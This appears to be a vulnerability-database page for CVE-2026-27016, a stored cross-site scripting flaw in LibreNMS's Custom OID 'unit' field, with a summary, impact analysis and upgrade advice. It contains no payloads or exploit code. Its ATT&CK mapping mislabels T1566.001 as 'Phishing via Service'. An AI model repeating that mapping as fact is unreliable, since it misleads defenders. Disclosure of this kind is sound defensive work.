CVE-2026-27016 in LibreNMS
Summary
by MITRE • 02/20/2026
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 24.10.0 through 26.1.1 are vulnerable to Stored XSS via the unit parameter in Custom OID. The Custom OID functionality lacks strip_tags() sanitization while other fields (name, oid, datatype) are sanitized. The unsanitized value is stored in the database and rendered without HTML escaping. This issue is fixed in version 26.2.0.
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Analysis
by VulDB Data Team • 02/20/2026
The vulnerability CVE-2026-27016 affects LibreNMS, a widely-used network monitoring solution that leverages PHP, MySQL, and SNMP technologies to provide automated network discovery and monitoring capabilities. This security flaw exists within the Custom OID functionality of the application, which allows network administrators to define custom object identifiers for monitoring specific network devices. The vulnerability represents a critical stored cross-site scripting weakness that can be exploited by attackers to inject malicious code into the application's database, subsequently executing harmful scripts against unsuspecting users who interact with the affected system.
The technical flaw stems from inconsistent input sanitization practices within the Custom OID implementation. While the application properly applies strip_tags() sanitization to the name, oid, and datatype parameters, the unit parameter remains unsanitized, creating a dangerous gap in the security controls. This inconsistency allows malicious input to bypass validation mechanisms and be stored directly in the MySQL database without proper HTML escaping. When the stored data is subsequently rendered in the user interface, the unsanitized unit parameter executes as HTML content, enabling attackers to inject malicious scripts that can perform actions such as stealing session cookies, redirecting users to malicious sites, or executing arbitrary code within the victim's browser context.
The operational impact of this vulnerability is significant for organizations relying on LibreNMS for network monitoring, as it provides attackers with a persistent means of compromising user sessions and potentially gaining unauthorized access to network monitoring capabilities. The stored nature of the XSS vulnerability means that the malicious payload remains active even after the initial injection, continuously affecting any user who views the affected Custom OID entries. This creates a persistent threat vector that can be exploited across multiple user sessions and potentially compromise the integrity of the entire network monitoring infrastructure. The vulnerability affects versions 24.10.0 through 26.1.1, making it a widespread issue affecting a substantial portion of the LibreNMS user base that has not yet upgraded to the patched version.
Organizations should immediately implement mitigations including upgrading to LibreNMS version 26.2.0, which properly addresses the sanitization issue by applying consistent strip_tags() filtering to all Custom OID parameters. Additionally, administrators should consider implementing network-level protections such as web application firewalls to detect and block malicious payloads, while also conducting thorough audits of existing Custom OID configurations to identify and remove any potentially compromised entries. The vulnerability aligns with CWE-79 (Cross-site Scripting) and maps to ATT&CK technique T1566.001 (Phishing via Service) and T1059.007 (Command and Scripting Interpreter: JavaScript) in the adversary tactics and techniques framework. Organizations should also consider implementing input validation at multiple layers of the application architecture, including database-level sanitization, to prevent similar inconsistencies in future development cycles and ensure comprehensive protection against similar vulnerabilities.